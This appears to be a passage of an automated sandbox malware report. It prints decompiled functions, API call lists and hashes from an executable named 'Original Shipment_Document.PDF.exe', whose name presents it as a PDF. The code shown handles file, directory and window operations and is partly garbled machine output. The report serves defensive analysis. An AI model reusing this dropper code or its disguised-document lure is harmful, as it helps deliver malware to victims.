				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x429204;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}








                                                0x00401573
                                                0x00401573
                                                0x00401581
                                                0x00401587
                                                0x00401589
                                                0x00401589
                                                0x0040158c
                                                0x00401594
                                                0x0040159c
                                                0x0040159c
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: d74cba4bcb10df2849d84578ff61c1288d4203641ce00d6d477458fcdfc0df96
                                                • Instruction ID: 0bd1c2541dc6badd11bf791eeeb1c61969952e167bd25157246a8193e9c71b51
                                                • Opcode Fuzzy Hash: d74cba4bcb10df2849d84578ff61c1288d4203641ce00d6d477458fcdfc0df96
                                                • Instruction Fuzzy Hash: C1E02632B00104EBCB14DFA8EDC086E73A5FB44310310483FE502B3290D6749C01CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                0x004068dc
                                                0x004068df
                                                0x004068e6
                                                0x004068ee
                                                0x004068fa
                                                0x00000000
                                                0x00406901
                                                0x004068f1
                                                0x004068f8
                                                0x00000000
                                                0x00406909
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                  • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                  • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                  • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                0x00405ffb
                                                0x00406008
                                                0x0040601d
                                                0x00406023

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                0x00405fd7
                                                0x00405fdd
                                                0x00405fe2
                                                0x00405feb
                                                0x00405feb
                                                0x00405ff4

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                0x00405abb
                                                0x00405ac3
                                                0x00000000
                                                0x00405ac9
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                • GetLastError.KERNEL32 ref: 00405AC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC2B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 19%
                                                			E6EAC2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6eac5050 != 0 && E6EAC2ADB(_a4) == 0) {
					 *0x6eac5054 = _t93;
					if( *0x6eac504c != 0) {
						_t93 =  *0x6eac504c;
					} else {
						E6EAC30C0(E6EAC2AD5(), __ecx);
						 *0x6eac504c = _t93;
					}
				}
				_t28 = E6EAC2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6EAC2AFD();
					_t72 = _a4;
					_t79 =  *0x6eac5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6eac5058 = _t72;
					E6EAC2AF7();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x6eac5034 = _t33;
					 *0x6eac5038 = _t79;
					if( *0x6eac5050 != 0 && E6EAC2ADB( *0x6eac5058) == 0) {
						 *0x6eac504c = _t94;
						_t94 =  *0x6eac5054;
					}
					_t80 =  *0x6eac5058;
					_a4 = _t80;
					 *0x6eac5058 =  *((intOrPtr*)(E6EAC2AFD() + _t80));
					_t37 = E6EAC2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6EAC2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6EAC2B14() + _a4 + _v8);
							_push(E6EAC2B1E());
							if( *0x6eac5050 <= 0 || E6EAC2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6eac504c =  *0x6eac504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6eac5058;
					if( *0x6eac5058 == 0) {
						 *0x6eac504c = 0;
					}
					E6EAC2B42(_t107, _a4,  *0x6eac5034,  *0x6eac5038);
					return _a4;
				}
				_push(E6EAC2B14() + _a4);
				_t56 = E6EAC2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6EAC2B26();
				_t87 = E6EAC2B22();
				_t90 = E6EAC2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                0x6eac2ba8
                                                0x6eac2bb9
                                                0x6eac2bc6
                                                0x6eac2bda
                                                0x6eac2bc8
                                                0x6eac2bcd
                                                0x6eac2bd2
                                                0x6eac2bd2
                                                0x6eac2bc6
                                                0x6eac2be3
                                                0x6eac2be8
                                                0x6eac2bee
                                                0x6eac2c32
                                                0x6eac2c32
                                                0x6eac2c37
                                                0x6eac2c3c
                                                0x6eac2c42
                                                0x6eac2c44
                                                0x6eac2c4a
                                                0x6eac2c57
                                                0x6eac2c59
                                                0x6eac2c5e
                                                0x6eac2c6b
                                                0x6eac2c7e
                                                0x6eac2c84
                                                0x6eac2c8a
                                                0x6eac2c8b
                                                0x6eac2c91
                                                0x6eac2c9d
                                                0x6eac2ca3
                                                0x6eac2cab
                                                0x6eac2cac
                                                0x6eac2caf
                                                0x6eac2cba
                                                0x6eac2cbc
                                                0x6eac2cc8
                                                0x6eac2cce
                                                0x6eac2cd6
                                                0x6eac2d02
                                                0x6eac2d03
                                                0x6eac2d05
                                                0x6eac2d09
                                                0x6eac2d09
                                                0x6eac2d10
                                                0x6eac2ce6
                                                0x6eac2ce6
                                                0x6eac2ce7
                                                0x6eac2cf5
                                                0x6eac2cfe
                                                0x6eac2cfe
                                                0x6eac2cd6
                                                0x6eac2cba
                                                0x6eac2d12
                                                0x6eac2d19
                                                0x6eac2d1b
                                                0x6eac2d1b
                                                0x6eac2d34
                                                0x6eac2d42
                                                0x6eac2d42
                                                0x6eac2bf9
                                                0x6eac2bfa
                                                0x6eac2bff
                                                0x6eac2c03
                                                0x6eac2c08
                                                0x6eac2c1c
                                                0x6eac2c1d
                                                0x6eac2c1e
                                                0x6eac2c20
                                                0x6eac2c25
                                                0x6eac2c27
                                                0x6eac2c27
                                                0x6eac2c2a
                                                0x6eac2c30
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000), ref: 6EAC2C57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 20149701c46cfa5cb08a93a4e1e368ec1d72b4541963e67a6f936f8afd2dbc94
                                                • Instruction ID: 3c57adf206869eaace2ded4ba04090f0e1dd6b3e47093148e686c30ccc7cb112
                                                • Opcode Fuzzy Hash: 20149701c46cfa5cb08a93a4e1e368ec1d72b4541963e67a6f936f8afd2dbc94
                                                • Instruction Fuzzy Hash: DE416E72504F049FDF119FE4DA48B9937BCEB55B18F21A825F505DB100DB3898C29BAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 33%
                                                			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E00406467(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E0040644E();
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                0x00402891
                                                0x00402891
                                                0x00402892
                                                0x0040289a
                                                0x0040289f
                                                0x004028a0
                                                0x004028af
                                                0x004028b8
                                                0x004028be
                                                0x00402ba1
                                                0x00402ba4
                                                0x00402ba4
                                                0x004028b8
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: e909eb12cb7f304e77c40ede1074a297a68e187afbf8d724b219cae3900333f3
                                                • Instruction ID: 9e2485e64ef9b70ac7e71c64f4b07727369f27addb678b73bbf1969ec48c6125
                                                • Opcode Fuzzy Hash: e909eb12cb7f304e77c40ede1074a297a68e187afbf8d724b219cae3900333f3
                                                • Instruction Fuzzy Hash: 05E01271904105BFDB01AFA5AE499BEB378EB44319B10483BF502F10D1DA794D219B2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t11;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t11 = _t8;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                0x00401749
                                                0x0040174f
                                                0x00401751
                                                0x004028fc
                                                0x00402903
                                                0x00402903
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: 2a3a7b52a522bc975c411e579a720d1ec686ca1eb2a39d973c7c3d36abd71f15
                                                • Instruction ID: 54a96972ebf6e5f7d9af5d5faa48068549acc1a9791dfdba756491a3e909a95f
                                                • Opcode Fuzzy Hash: 2a3a7b52a522bc975c411e579a720d1ec686ca1eb2a39d973c7c3d36abd71f15
                                                • Instruction Fuzzy Hash: 06E0D872204100EBE740DB64DD48EAA3368DF40318B204236E101A50D1E6B48901932D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x0040607e
                                                0x0040608e
                                                0x00406096
                                                0x00000000
                                                0x0040609d
                                                0x00000000
                                                0x0040609f

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x004060ad
                                                0x004060bd
                                                0x004060c5
                                                0x00000000
                                                0x004060cc
                                                0x00000000
                                                0x004060ce

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
